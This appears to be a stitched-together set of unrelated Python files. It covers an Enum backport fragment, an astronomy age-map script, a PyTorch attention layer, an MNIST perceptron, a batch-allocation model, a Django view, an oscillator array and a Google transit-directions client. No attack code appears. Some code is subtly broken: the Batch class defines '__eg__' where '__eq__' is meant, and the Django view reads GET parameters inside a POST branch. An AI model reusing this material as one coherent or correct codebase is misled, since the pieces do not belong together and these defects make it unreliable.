__repr__ def __str__(self): return "%s.%s" % (self.__class__.__name__, self._name_) temp_enum_dict['__str__'] = __str__ del __str__ if pyver >= 3.0: def __dir__(self): added_behavior = [ m for cls in self.__class__.mro() for m in cls.__dict__ if m[0] != '_' and m not in self._member_map_ ] return (['__class__', '__doc__', '__module__', ] + added_behavior) temp_enum_dict['__dir__'] = __dir__ del __dir__ def __format__(self, format_spec): # mixed-in Enums should use the mixed-in type's __format__, otherwise # we can get strange results with the Enum name showing up instead of # the value # pure Enum branch if self._member_type_ is object: cls = str val = str(self) # mix-in branch else: cls = self._member_type_ val = self.value return cls.__format__(val, format_spec) temp_enum_dict['__format__'] = __format__ del __format__ #################################### # Python's less than 2.6 use __cmp__ if pyver < 2.6: def __cmp__(self, other): if type(other) is self.__class__: if self is other: return 0 return -1 return NotImplemented raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__)) temp_enum_dict['__cmp__'] = __cmp__ del __cmp__ else: def __le__(self, other): raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__)) temp_enum_dict['__le__'] = __le__ del __le__ def __lt__(self, other): raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__)) temp_enum_dict['__lt__'] = __lt__ del __lt__ def __ge__(self, other): raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__)) temp_enum_dict['__ge__'] = __ge__ del __ge__ def __gt__(self, other): raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__)) temp_enum_dict['__gt__'] = __gt__ del __gt__ def __eq__(self, other): if type(other) is self.__class__: return self is other return NotImplemented temp_enum_dict['__eq__'] = __eq__ del __eq__ def __ne__(self, other): if type(other) is self.__class__: return self is not other return NotImplemented temp_enum_dict['__ne__'] = __ne__ del __ne__ def __hash__(self): return hash(self._name_) temp_enum_dict['__hash__'] = __hash__ del __hash__ def __reduce_ex__(self, proto): return self.__class__, (self._value_, ) temp_enum_dict['__reduce_ex__'] = __reduce_ex__ del __reduce_ex__ # _RouteClassAttributeToGetattr is used to provide access to the `name` # and `value` properties of enum members while keeping some measure of # protection from modification, while still allowing for an enumeration # to have members named `name` and `value`. This works because enumeration # members are not set directly on the enum class -- __getattr__ is # used to look them up. @_RouteClassAttributeToGetattr def name(self): return self._name_ temp_enum_dict['name'] = name del name @_RouteClassAttributeToGetattr def value(self): return self._value_ temp_enum_dict['value'] = value del value @classmethod def _convert(cls, name, module, filter, source=None): """ Create a new Enum subclass that replaces a collection of global constants """ # convert all constants from source (or module) that pass filter() to # a new Enum called name, and export the enum and its members back to # module; # also, replace the __reduce_ex__ method so unpickling works in # previous Python versions module_globals = vars(_sys.modules[module]) if source: source = vars(source) else: source = module_globals members = dict((name, value) for name, value in source.items() if filter(name)) cls = cls(name, members, module=module) cls.__reduce_ex__ = _reduce_ex_by_name module_globals.update(cls.__members__) module_globals[name] = cls return cls temp_enum_dict['_convert'] = _convert del _convert Enum = EnumMeta('Enum', (object, ), temp_enum_dict) del temp_enum_dict # Enum has now been created ########################### class IntEnum(int, Enum): """Enum where members are also (and must be) ints""" def _reduce_ex_by_name(self, proto): return self.name def unique(enumeration): """Class decorator that ensures only unique members exist in an enumeration.""" duplicates = [] for name, member in enumeration.__members__.items(): if name != member.name: duplicates.append((name, member.name)) if duplicates: duplicate_names = ', '.join( ["%s -> %s" % (alias, name) for (alias, name) in duplicates] ) raise ValueError('duplicate names found in %r: %s' % (enumeration, duplicate_names) ) return enumeration
python
#!/usr/bin/env python import numpy as np import healpy as hp import astropy.table as Table import matplotlib.pyplot as plt from matplotlib import cm from matplotlib import rc from matplotlib import rcParams from matplotlib.colors import LogNorm plt.rc('text', usetex=True) plt.rc('font', family='serif') import pyfits print("Import data") # import the data hdulist = pyfits.open( "/Users/annaho/Data/LAMOST/Mass_And_Age/catalog_paper.fits") tbdata = hdulist[1].data # # cols = hdulist[1].columns # # cols.names in_martig_range = tbdata.field("in_martig_range") snr = tbdata.field("snr") #choose = np.logical_and(in_martig_range, snr > 80) choose = in_martig_range print(sum(choose)) chisq = tbdata.field("chisq") ra_lamost = tbdata.field('ra')[choose] dec_lamost = tbdata.field('dec')[choose] val_lamost = 10**(tbdata.field("cannon_age")[choose]) hdulist.close() print("Getting APOGEE data") hdulist = pyfits.open( "/Users/annaho/Data/APOGEE/Ness2016_Catalog_Full_DR12_Info.fits") tbdata = hdulist[1].data ra_apogee_all = tbdata['RA'] dec_apogee_all = tbdata['DEC'] val_apogee_all = np.exp(tbdata['lnAge']) good_coords = np.logical_and(ra_apogee_all > -90, dec_apogee_all > -90) good = np.logical_and(good_coords, val_apogee_all > -90) ra_apogee = ra_apogee_all[good] dec_apogee = dec_apogee_all[good] val_apogee = val_apogee_all[good] hdulist.close() ra_both = np.hstack((ra_apogee, ra_lamost)) dec_both = np.hstack((dec_apogee, dec_lamost)) val_all = np.hstack((val_apogee, val_lamost)) print("create grid") # create a RA and Dec grid ra_all = [] dec_all = [] for ra in np.arange(0, 360, 0.5): for dec in np.arange(-90, 90, 0.5): ra_all.append(ra) dec_all.append(dec) ra = np.array(ra_all) dec = np.array(dec_all) # convert RA and Dec to phi and theta coordinates def toPhiTheta(ra, dec): phi = ra * np.pi/180. theta = (90.0 - dec) * np.pi / 180. return phi, theta phi, theta = toPhiTheta(ra, dec) phi_lamost, theta_lamost = toPhiTheta(ra_lamost, dec_lamost) phi_apogee, theta_apogee = toPhiTheta(ra_apogee, dec_apogee) phi_all, theta_all = toPhiTheta(ra_both, dec_both) # to just plot all points, do #hp.visufunc.projplot(theta, phi, 'bo') #hp.visufunc.projplot(theta_lamost, phi_lamost, 'bo') #hp.visufunc.graticule() # just the bare background w/ lines # more examples are here # https://healpy.readthedocs.org/en/latest/generated/healpy.visufunc.projplot.html#healpy.visufunc.projplot ## to plot a 2D histogram in the Mollweide projection # define the HEALPIX level # NSIDE = 32 # defines the resolution of the map # NSIDE = 128 # from paper 1 NSIDE = 64 # find the pixel ID for each point # pix = hp.pixelfunc.ang2pix(NSIDE, theta, phi) pix_lamost = hp.pixelfunc.ang2pix(NSIDE, theta_lamost, phi_lamost) pix_apogee = hp.pixelfunc.ang2pix(NSIDE, theta_apogee, phi_apogee) pix_all = hp.pixelfunc.ang2pix(NSIDE, theta_all, phi_all) # pix is in the order of ra and dec # prepare the map array m_lamost = hp.ma(np.zeros(hp.nside2npix(NSIDE), dtype='float')) mask_lamost = np.zeros(hp.nside2npix(NSIDE), dtype='bool') for pix_val in np.unique(pix_lamost): choose = np.where(pix_lamost==pix_val)[0] if len(choose) == 1: # #m_lamost[pix_val] = rmag_lamost[choose[0]] m_lamost[pix_val] = val_lamost[choose[0]] else: #m_lamost[pix_val] = np.median(rmag_lamost[choose]) m_lamost[pix_val] = np.median(val_lamost[choose]) mask_lamost[np.setdiff1d(np.arange(len(m_lamost)), pix_lamost)] = 1 m_lamost.mask = mask_lamost m_apogee= hp.ma(np.zeros(hp.nside2npix(NSIDE), dtype='float')) mask_apogee= np.zeros(hp.nside2npix(NSIDE), dtype='bool') for pix_val in np.unique(pix_apogee): choose = np.where(pix_apogee==pix_val)[0] if len(choose) == 1: m_apogee[pix_val] = val_apogee[choose[0]] else: m_apogee[pix_val] = np.median(val_apogee[choose]) mask_apogee[np.setdiff1d(np.arange(len(m_apogee)), pix_apogee)] = 1 m_apogee.mask = mask_apogee m_all = hp.ma(np.zeros(hp.nside2npix(NSIDE), dtype='float')) mask_all= np.zeros(hp.nside2npix(NSIDE), dtype='bool') for pix_val in np.unique(pix_all): choose = np.where(pix_all==pix_val)[0] if len(choose) == 1: m_all[pix_val] = val_all[choose[0]] else: m_all[pix_val] = np.median(val_all[choose]) mask_all[np.setdiff1d(np.arange(len(m_all)), pix_all)] = 1 m_all.mask = mask_all # perceptually uniform: inferno, viridis, plasma, magma #cmap=cm.magma cmap = cm.RdYlBu_r cmap.set_under('w') # composite map # plot map ('C' means the input coordinates were in the equatorial system) # rcParams.update({'font.size':16}) hp.visufunc.mollview(m_apogee, coord=['C','G'], rot=(150, 0, 0), flip='astro', notext=False, title=r'Ages from Ness et al. 2016 (APOGEE)', cbar=True, norm=None, min=0, max=12, cmap=cmap, unit = 'Gyr') #hp.visufunc.mollview(m_lamost, coord=['C','G'], rot=(150, 0, 0), flip='astro', # notext=True, title=r'$\alpha$/M for 500,000 LAMOST giants', cbar=True, # norm=None, min=-0.07, max=0.3, cmap=cmap, unit = r'$\alpha$/M [dex]') #notext=True, title="r-band magnitude for 500,000 LAMOST giants", cbar=True, #norm=None, min=11, max=17, cmap=cmap, unit = r"r-band magnitude [mag]") # hp.visufunc.mollview(m_all, coord=['C','G'], rot=(150, 0, 0), flip='astro', # notext=True, title='Ages from Ness et al. 2016 + LAMOST giants', # cbar=True, norm=None, min=0.00, max=12, cmap=cmap, unit = 'Gyr') hp.visufunc.graticule() plt.show() #plt.savefig("full_age_map.png") #plt.savefig("apogee_age_map.png") #plt.savefig("lamost_am_map_magma.png") #plt.savefig("lamost_rmag_map.png")
python
import torch from torch import nn import torch.nn.functional as F class SelfAttention2d(nn.Module): def __init__(self, in_channels, spectral_norm=True): super(SelfAttention2d, self).__init__() # Channel multiplier self.in_channels = in_channels self.theta = nn.Conv2d(self.in_channels, self.in_channels // 8, kernel_size=1, padding=0, bias=False) self.phi = nn.Conv2d(self.in_channels, self.in_channels // 8, kernel_size=1, padding=0, bias=False) self.g = nn.Conv2d(self.in_channels, self.in_channels // 2, kernel_size=1, padding=0, bias=False) self.o = nn.Conv2d(self.in_channels // 2, self.in_channels, kernel_size=1, padding=0, bias=False) if spectral_norm is True: self.theta = nn.utils.spectral_norm(self.theta) self.phi = nn.utils.spectral_norm(self.phi) self.g = nn.utils.spectral_norm(self.g) self.o = nn.utils.spectral_norm(self.o) # Learnable gain parameter self.gamma = nn.Parameter(torch.tensor(0.0), requires_grad=True) def forward(self, x, y=None): # Apply convs theta = self.theta(x) phi = F.max_pool2d(self.phi(x), [2, 2]) g = F.max_pool2d(self.g(x), [2, 2]) # Perform reshapes theta = theta.view(-1, self.in_channels // 8, x.shape[2] * x.shape[3]) phi = phi.view(-1, self.in_channels // 8, x.shape[2] * x.shape[3] // 4) g = g.view(-1, self.in_channels // 2, x.shape[2] * x.shape[3] // 4) # Matmul and softmax to get attention maps beta = F.softmax(torch.bmm(theta.transpose(1, 2), phi), -1) # Attention map times g path o = self.o(torch.bmm(g, beta.transpose(1, 2)).view(-1, self.in_channels // 2, x.shape[2], x.shape[3])) return self.gamma * o + x
python
#coding:utf-8 #Author:Dustin #Algorithm:单层感知机(二分类) ''' 数据集:Mnist 训练集数量:60000 测试集数量:10000 ------------------------------ 运行结果: 正确率:80.29%(二分类) 运行时长:78.55s ''' from keras.datasets import mnist import numpy as np import time class Perceptron: #定义初始化方法,记录迭代次数和学习率。 def __init__(self, iteration = 30, learning_rate = 0.001): self.iteration = iteration self.rate = learning_rate #定义fit方法,使用训练集完成参数w和b的训练。 def fit(self, train_data, train_label): print("开始训练") data = np.mat(train_data) #转换为矩阵,后面的运算会更方便。实际上,在转换为矩阵后运算符重载了。 label = np.mat(train_label).T #将标签矩阵转置 m, n = np.shape(data) #获取数据行列数 w = np.zeros((1, n)) #初始化w矩阵 b = 0 #初始化偏置项b iteration = self.iteration rate = self.rate for i in range(iteration): #迭代iteration次 for j in range(m): #每次迭代使用m组数据更新参数,m在fit方法中即训练集样本数。 xi = data[j] #选取单个样本所对应的矩阵 yi = label[j] #选取样本标签 result = -1 * yi * (w * xi.T + b) #使用梯度下降法求解参数w和b if result >= 0: w += rate * (yi * xi) #注意yi和xi的顺序,只有yi在前才能保证结果维度的正确性。 b += + rate * yi print('\r迭代进度|%-50s| [%d/%d]' % ('█' * int((i / iteration) * 50 + 2), i + 1, iteration), end='') #绘制进度条 self.w = w #更新参数w和b self.b = b print("\n结束训练") #定义predict方法,读取测试集,返回预测标签。 def predict(self, test_data): print("开始预测") data = np.mat(test_data) m, n = np.shape(data) predict_label = [] #定义存储预测标签的列表 w = self.w #读取fit后的w和b b = self.b for i in range(m): #对每一个样本进行检测 xi = data[i] result = np.sign(w * xi.T + b) predict_label.append(result) print("结束预测") predict_label = np.array(predict_label) return predict_label #返回预测标签值 #定义score函数,返回预测准确率。 def score(self, test_data, test_label): predict_label = np.mat(self.predict(test_data)).T test_label = np.mat(test_label).T m, n = np.shape(test_label) error = 0 for i in range(m): if (predict_label[i] != test_label[i]): error += 1 accuracy = 1 - (error / m) return accuracy if __name__ == '__main__': #对数据进行预处理,将每一个样本的图片数据由28*28的矩阵转换为1*784的矩阵。 #由于单层感知机只能处理二分类的情况,所以需要对标签进行二值化。 (train_data, train_label), (test_data, test_label) = mnist.load_data() train_data = np.array([np.array(i).flatten() for i in train_data]) train_label = np.array([1 if i >= 5 else - 1 for i in train_label]) test_data = np.array([np.array(i).flatten() for i in test_data]) test_label = np.array([1 if i >= 5 else - 1 for i in test_label]) #对训练和测试过程进行计时 start = time.time() pc = Perceptron(iteration=30, learning_rate=0.001) pc.fit(train_data, train_label) print("单层感知机预测准确率:%.2f%%" % (pc.score(test_data, test_label)*100)) end = time.time() print("耗时:%.2f s" %(end - start))
python
from __future__ import annotations from dataclasses import dataclass from datetime import date from typing import Optional, Set, List class OutOfStock(Exception): pass def allocate(line: OrderLine, batches: List[Batch]) -> str: try: batch = next( b for b in sorted(batches) if b.can_allocate(line) ) batch.allocate(line) return batch.reference except StopIteration: raise OutOfStock(f'Out of stock for sku {line.sku}') # First cut of domain model for batches @dataclass(frozen=True) class OrderLine: orderid: str sku: str qty: int class Batch: def __init__(self, ref: str, sku: str, qty: int, eta: Optional[date] ): self.reference = ref self.sku = sku self.eta = eta self._purchased_quantity = qty self._allocations = set() # type: Set [OrderLine] def __eg__(self, other): if not isinstance(other, Batch): return False return other.reference == self.reference def __hash__(self): return hash(self.reference) def __gt__(self, other): if self.eta is None: return False if other.eta is None: return True return self.eta > other.eta def allocate(self, line: OrderLine): if self.can_allocate(line): self._allocations.add(line) def deallocate(self, line: OrderLine): if line in self._allocations: self._allocations.remove(line) @property def allocated_quantity(self) -> int: return sum(line.qty for line in self._allocations) @property def available_quantity(self) -> int: return self._purchased_quantity - self.allocated_quantity def can_allocate(self, line: OrderLine) -> bool: return self.sku == line.sku and self.available_quantity >= line.qty
python
from django.shortcuts import render from .models import Product_origin from django.http import JsonResponse # Create your views here. def product(request): if request.method == "POST": product = request.GET['p'] product_details = Product_origin.objects.get(Product_code=product) print(product_details.Product_name) response = {"tab": "propg", "name": product_details.Product_name, "mrp": product_details.Product_mrp, "company": product_details.Product_company} return JsonResponse(response) else: return render(request, 'dash_mobilev3.html')
python
""" construct 2d array of pase state distance array """ import sys import os import re # sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from pathlib import Path sys.path.append(Path(__file__).resolve().parents[1]) if __name__ == '__main__' and __package__ is None: __package__ = 'kurosc' import numpy as np from lib.plot_solution import plot_phase from spatialKernel.wavelet import kernel class oscillatorArray(object): def __init__(self, dimension: tuple = (16,16), domain:tuple = (0,np.pi), output_level:int = 3 # not sure if need to be passing this thru ): self.domain = domain self.kernel = kernel() self.ic = self.initial_conditions(*dimension) self.distance = self.distance() self.level = output_level self.plot_phase = plot_phase self.plot_directory = None # initialized in a plot module self.natural_frequency = None # init & evalin model ... self.natural_frequency_dist() #TODO fix this self.interaction_params = None self.kernel_params = None self.gain = None def initial_conditions(self, m:int = 16, n:int = 16, params:dict = {'a': 1/6, 'b': 0, 'c': 2/5, 'order':0, } )->np.ndarray: """rtrn x vals for normal weighted across -pi pi # distinct vals for replace = false """ ### range discerned by eye fig 1 fitting a&c ### 1hz spread --> 2pi t*2pi at 1 s gives 1 rev ### omega = 2pi/s so sin(omega*t) makes sense ### chose np.max(abs(domain)) to scale by pi even if - ### np.max(np.abs(self.domain)) == pi x = np.linspace(params['b']-3.5*params['c'], params['b']+3.5*params['c'], int(1e6) )*np.max(np.abs(self.domain)) prob = self.kernel.wavelet(self.kernel.gaussian, x, *params.values(), True ) prob = prob/np.sum(prob) # pdf for weights rng = np.random.default_rng() phase = rng.choice(x, size=np.prod(m*n), p = prob, replace=False, ).reshape(m,n) print('\nintial contitions in phase space:', np.round(np.mean(phase),3), '\nstdev:', np.round(np.std(phase),3) ) return phase def natural_frequency_dist(self, params:dict = {'a': 1/6, 'b': 0, 'c': 2/5, 'order':0, } )->np.ndarray: """rtrn x vals for normal weighted abt 0hz # distinct vals for replace = false """ # range discerned by eye fig 1 fitting a&c x = np.linspace(params['b']-3.5*params['c'], params['b']+3.5*params['c'], int(1e6) ) #this just uses nominal 0th dertivative to return gaussian and normalize prob = self.kernel.wavelet(self.kernel.gaussian, x, *params.values(), True ) prob = prob/np.sum(prob) # pdf for weights from max-normalized wavelet rng = np.random.default_rng() frequency = rng.choice(x, size=np.prod(self.ic.shape), p = prob, replace=True, ) print('\nmean natural frequency in hz:', np.round(np.mean(frequency),3), '\nstdev:', np.round(np.std(frequency),3), '\nconverted to phase angle [-pi,pi] on output' ) # t --> [-pi pi) return frequency*np.pi def uniform_initial_conditions(self, m:int = 16, n:int = 16, )->np.ndarray: """return random 2D phase array""" scale = np.max(np.absolute(self.domain)) offset = np.min(self.domain) # print(scale, offset) rng = np.random.default_rng() return scale*rng.random((m,n)) + offset def distance(self, t:str = 'float') -> np.ndarray: """construct m*n*(m*n) array of euclidian distance as integer or float this could be optimized but is only called once as opposed to eth phase difference calc """ d = np.zeros([self.ic.shape[0]*self.ic.shape[1], self.ic.shape[1]*self.ic.shape[0]]) u,v = np.meshgrid(np.arange(self.ic.shape[0]), np.arange(self.ic.shape[1]), sparse=False, indexing='xy') u = u.ravel() v = v.ravel() z = np.array([u,v]).T for (k,x) in enumerate(z): d[k,:] = np.array(np.sqrt((u - x[0])**2 + (v - x[1])**2),dtype=t) return d # d = np.zeros([self.ic.shape[0]*self.ic.shape[1], # self.ic.shape[1], # self.ic.shape[0]]) # # # k=0 # for j in np.arange(self.ic.shape[1]): # for i in np.arange(self.ic.shape[0]): # # print(i*j,j,i) # d[k,...] = self.indiv_distance((i,j),integer) # k+=1 # return d # def indiv_distance(self, # indx:tuple = (0,0), # integer:bool = False, # ) -> np.ndarray: # ###construct m*n array of euclidian distance as integer or float # # x,y = np.meshgrid(np.arange(self.ic.shape[0]), # np.arange(self.ic.shape[1]), # sparse=False, indexing='xy') # # # print('dx:\n',(indx[0] - x), # '\ndy:\n',(indx[1] - y), # '\nsq(dx^2+dy^2):\n', # np.sqrt((indx[0] - x)**2 + (indx[1] - y)**2), # '\n') # # # if not integer: # return np.sqrt((indx[0] - x)**2 + (indx[1] - y)**2) # else: # return np.asarray(np.sqrt((indx[0] - x)**2 + (indx[1] - y)**2),dtype = int) def main(): """ this demos a random contour plot """ corticalArray = oscillatorArray((64,64),(-np.pi,np.pi),1) x = np.linspace(0,corticalArray.ic.shape[0], corticalArray.ic.shape[1]) y = np.linspace(0,corticalArray.ic.shape[1], corticalArray.ic.shape[0]) x,y = np.meshgrid(x,y) phase_array = np.asarray([x.ravel(), y.ravel(), corticalArray.ic.ravel()] ).T corticalArray.plot_phase(phase_array, 'Oscillator Phase $\in$ [-$\pi$,$\pi$)', 'Location y', 'Location x' ) if __name__ == '__main__': main()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals import urllib from datetime import datetime import time import json from alex.applications.PublicTransportInfoEN.site_preprocessing import expand_stop from alex.tools.apirequest import APIRequest from alex.utils.cache import lru_cache class Travel(object): """Holder for starting and ending point (and other parameters) of travel.""" def __init__(self, **kwargs): """Initializing (just filling in data). Accepted keys: from_city, from_stop, to_city, to_stop, vehicle, max_transfers.""" self.from_stop_geo = kwargs['from_stop_geo'] self.to_stop_geo = kwargs['to_stop_geo'] self.from_city = kwargs['from_city'] self.from_stop = kwargs['from_stop'] if kwargs['from_stop'] not in ['__ANY__', 'none'] else None self.to_city = kwargs['to_city'] self.to_stop = kwargs['to_stop'] if kwargs['to_stop'] not in ['__ANY__', 'none'] else None self.vehicle = kwargs['vehicle'] if kwargs['vehicle'] not in ['__ANY__', 'none', 'dontcare'] else None self.max_transfers = (kwargs['max_transfers'] if kwargs['max_transfers'] not in ['__ANY__', 'none', 'dontcare'] else None) def get_minimal_info(self): """Return minimal waypoints information in the form of a stringified inform() dialogue act.""" res = [] if self.from_city != self.to_city or (bool(self.from_stop) != bool(self.to_stop)): res.append("inform(from_city='%s')" % self.from_city) if self.from_stop is not None: res.append("inform(from_stop='%s')" % self.from_stop) if self.from_city != self.to_city or (bool(self.from_stop) != bool(self.to_stop)): res.append("inform(to_city='%s')" % self.to_city) if self.to_stop is not None: res.append("inform(to_stop='%s')" % self.to_stop) if self.vehicle is not None: res.append("inform(vehicle='%s')" % self.vehicle) if self.max_transfers is not None: res.append("inform(num_transfers='%s')" % str(self.max_transfers)) return '&'.join(res) class Directions(Travel): """Ancestor class for transit directions, consisting of several routes.""" def __init__(self, **kwargs): if 'travel' in kwargs: super(Directions, self).__init__(**kwargs['travel'].__dict__) else: super(Directions, self).__init__(**kwargs) self.routes = [] def __getitem__(self, index): return self.routes[index] def __len__(self): return len(self.routes) def __repr__(self): ret = '' for i, route in enumerate(self.routes, start=1): ret += "ROUTE " + unicode(i) + "\n" + route.__repr__() + "\n\n" return ret class Route(object): """Ancestor class for one transit direction route.""" def __init__(self): self.legs = [] def __repr__(self): ret = '' for i, leg in enumerate(self.legs, start=1): ret += "LEG " + unicode(i) + "\n" + leg.__repr__() + "\n" return ret class RouteLeg(object): """One traffic directions leg.""" def __init__(self): self.steps = [] def __repr__(self): return "\n".join(step.__repr__() for step in self.steps) class RouteStep(object): """One transit directions step -- walking or using public transport. Data members: travel_mode -- TRANSIT / WALKING * For TRANSIT steps: departure_stop departure_time arrival_stop arrival_time headsign -- direction of the transit line vehicle -- type of the transit vehicle (tram, subway, bus) line_name -- name or number of the transit line * For WALKING steps: duration -- estimated walking duration (seconds) """ MODE_TRANSIT = 'TRANSIT' MODE_WALKING = 'WALKING' def __init__(self, travel_mode): self.travel_mode = travel_mode if self.travel_mode == self.MODE_TRANSIT: self.departure_stop = None self.departure_time = None self.arrival_stop = None self.arrival_time = None self.headsign = None self.vehicle = None self.line_name = None elif self.travel_mode == self.MODE_WALKING: self.duration = None def __repr__(self): ret = self.travel_mode if self.travel_mode == self.MODE_TRANSIT: ret += ': ' + self.vehicle + ' ' + self.line_name + \ ' [^' + self.headsign + ']: ' + self.departure_stop + \ ' ' + str(self.departure_time) + ' -> ' + \ self.arrival_stop + ' ' + str(self.arrival_time) elif self.travel_mode == self.MODE_WALKING: ret += ': ' + str(self.duration / 60) + ' min, ' + \ ((str(self.distance) + ' m') if hasattr(self, 'distance') else '') return ret class DirectionsFinder(object): """Abstract ancestor for transit direction finders.""" def get_directions(self, from_city, from_stop, to_city, to_stop, departure_time=None, arrival_time=None, parameters=None): """ Retrieve the transit directions from the given stop to the given stop at the given time. Should be implemented in derived classes. """ raise NotImplementedError() class GoogleDirections(Directions): """Traffic directions obtained from Google Maps API.""" def __init__(self, input_json={}, **kwargs): super(GoogleDirections, self).__init__(**kwargs) for route in input_json['routes']: g_route = GoogleRoute(route) # if VEHICLE is defined, than route must be composed of walking and VEHICLE transport if kwargs['travel'].vehicle is not None and kwargs['travel'].vehicle not in ['__ANY__', 'none', 'dontcare']: route_vehicles = set([step.vehicle for leg in g_route.legs for step in leg.steps if hasattr(step, "vehicle")]) if len(route_vehicles) != 0 and (len(route_vehicles) > 1 or kwargs['travel'].vehicle not in route_vehicles): continue # if MAX_TRANSFERS is defined, than the route must be composed of walking and limited number of transport steps if kwargs['travel'].max_transfers is not None and kwargs['travel'].max_transfers not in ['__ANY__', 'none', 'dontcare']: num_transfers = len([step for leg in g_route.legs for step in leg.steps if step.travel_mode == GoogleRouteLegStep.MODE_TRANSIT]) if num_transfers > int(kwargs['travel'].max_transfers) + 1: continue self.routes.append(g_route) class GoogleRoute(Route): def __init__(self, input_json): super(GoogleRoute, self).__init__() for leg in input_json['legs']: self.legs.append(GoogleRouteLeg(leg)) class GoogleRouteLeg(RouteLeg): def __init__(self, input_json): super(GoogleRouteLeg, self).__init__() for step in input_json['steps']: self.steps.append(GoogleRouteLegStep(step)) self.distance = input_json['distance']['value'] class GoogleRouteLegStep(RouteStep): VEHICLE_TYPE_MAPPING = { 'RAIL': 'train', 'METRO_RAIL': 'tram', 'SUBWAY': 'subway', 'TRAM': 'tram', 'MONORAIL': 'monorail', 'HEAVY_RAIL': 'train', 'COMMUTER_TRAIN': 'train', 'HIGH_SPEED_TRAIN': 'train', 'BUS': 'bus', 'INTERCITY_BUS': 'bus', 'TROLLEYBUS': 'bus', 'SHARE_TAXI': 'bus', 'FERRY': 'ferry', 'CABLE_CAR': 'cable_car', 'GONDOLA_LIFT': 'ferry', 'FUNICULAR': 'cable_car', 'OTHER': 'dontcare', 'Train': 'train', 'Long distance train': 'train' } def __init__(self, input_json): self.travel_mode = input_json['travel_mode'] if self.travel_mode == self.MODE_TRANSIT: data = input_json['transit_details'] self.departure_stop = data['departure_stop']['name'] self.departure_time = datetime.fromtimestamp(data['departure_time']['value']) self.arrival_stop = data['arrival_stop']['name'] self.arrival_time = datetime.fromtimestamp(data['arrival_time']['value']) self.headsign = data['headsign'] # sometimes short_name not present if not 'short_name' in data['line']: self.line_name = data['line']['name'] else: self.line_name = data['line']['short_name'] vehicle_type = data['line']['vehicle'].get('type', data['line']['vehicle']['name']) self.vehicle = self.VEHICLE_TYPE_MAPPING.get(vehicle_type, vehicle_type.lower()) # normalize stop names self.departure_stop = expand_stop(self.departure_stop) self.arrival_stop = expand_stop(self.arrival_stop) self.num_stops = data['num_stops'] elif self.travel_mode == self.MODE_WALKING: self.duration = input_json['duration']['value'] self.distance = input_json['distance']['value'] class GoogleDirectionsFinder(DirectionsFinder, APIRequest): """Transit direction finder using the Google Maps query engine.""" def __init__(self, cfg): DirectionsFinder.__init__(self) APIRequest.__init__(self, cfg, 'google-directions', 'Google directions query') self.directions_url = 'https://maps.googleapis.com/maps/api/directions/json' if 'key' in cfg['DM']['directions'].keys(): self.api_key = cfg['DM']['directions']['key'] else: self.api_key = None @lru_cache(maxsize=10) def get_directions(self, waypoints, departure_time=None, arrival_time=None): """Get Google maps transit directions between the given stops at the given time and date. The time/date should be given as a datetime.datetime object. Setting the correct date is compulsory! """ # TODO: refactor - eliminate from_stop,street,city,borough and make from_place, from_area and use it as: # TODO: from_place = from_stop || from_street1 || from_street1&from_street2 # TODO: from_area = from_borough || from_city parameters = list() if not waypoints.from_stop_geo: from_waypoints =[expand_stop(waypoints.from_stop, False), expand_stop(waypoints.from_city, False)] parameters.extend([wp for wp in from_waypoints if wp and wp != 'none']) else: parameters.append(waypoints.from_stop_geo['lat']) parameters.append(waypoints.from_stop_geo['lon']) origin = ','.join(parameters).encode('utf-8') parameters = list() if not waypoints.to_stop_geo: to_waypoints = [expand_stop(waypoints.to_stop, False), expand_stop(waypoints.to_city, False)] parameters.extend([wp for wp in to_waypoints if wp and wp != 'none']) else: parameters.append(waypoints.to_stop_geo['lat']) parameters.append(waypoints.to_stop_geo['lon']) destination = ','.join(parameters).encode('utf-8') data = { 'origin': origin, 'destination': destination, 'region': 'us', 'alternatives': 'true', 'mode': 'transit', 'language': 'en', } if departure_time: data['departure_time'] = int(time.mktime(departure_time.timetuple())) elif arrival_time: data['arrival_time'] = int(time.mktime(arrival_time.timetuple())) # add "premium" parameters if self.api_key: data['key'] = self.api_key if waypoints.vehicle: data['transit_mode'] = self.map_vehicle(waypoints.vehicle) data['transit_routing_preference'] = 'fewer_transfers' if waypoints.max_transfers else 'less_walking' self.system_logger.info("Google Directions request:\n" + str(data)) page = urllib.urlopen(self.directions_url + '?' + urllib.urlencode(data)) response = json.load(page) self._log_response_json(response) directions = GoogleDirections(input_json=response, travel=waypoints) self.system_logger.info("Google Directions response:\n" + unicode(directions)) return directions def map_vehicle(self, vehicle): """maps PTIEN vehicle type to GOOGLE DIRECTIONS query vehicle""" # any of standard google inputs if vehicle in ['bus', 'subway', 'train', 'tram', 'rail']: return vehicle # anything on the rail if vehicle in ['monorail', 'night_tram', 'monorail']: return 'rail' # anything on the wheels if vehicle in ['trolleybus', 'intercity_bus', 'night_bus']: return 'bus' # dontcare return 'bus|rail' def _todict(obj, classkey=None): """Convert an object graph to dictionary. Adapted from: http://stackoverflow.com/questions/1036409/recursively-convert-python-object-graph-to-dictionary . """ if isinstance(obj, dict): for k in obj.keys(): obj[k] = _todict(obj[k], classkey) return obj elif hasattr(obj, "__keylist__"): data = {key: _todict(obj[key], classkey) for key in obj.__keylist__ if not callable(obj[key])} if classkey is not None and hasattr(obj, "__class__"): data[classkey] = obj.__class__.__name__ return data elif hasattr(obj, "__dict__"): data = {key: _todict(value, classkey) for key, value in obj.__dict__.iteritems() if not callable(value)} if classkey is not None and hasattr(obj, "__class__"): data[classkey] = obj.__class__.__name__ return data elif hasattr(obj, "__iter__"): return [_todict(v, classkey) for v in obj] else: return obj
python
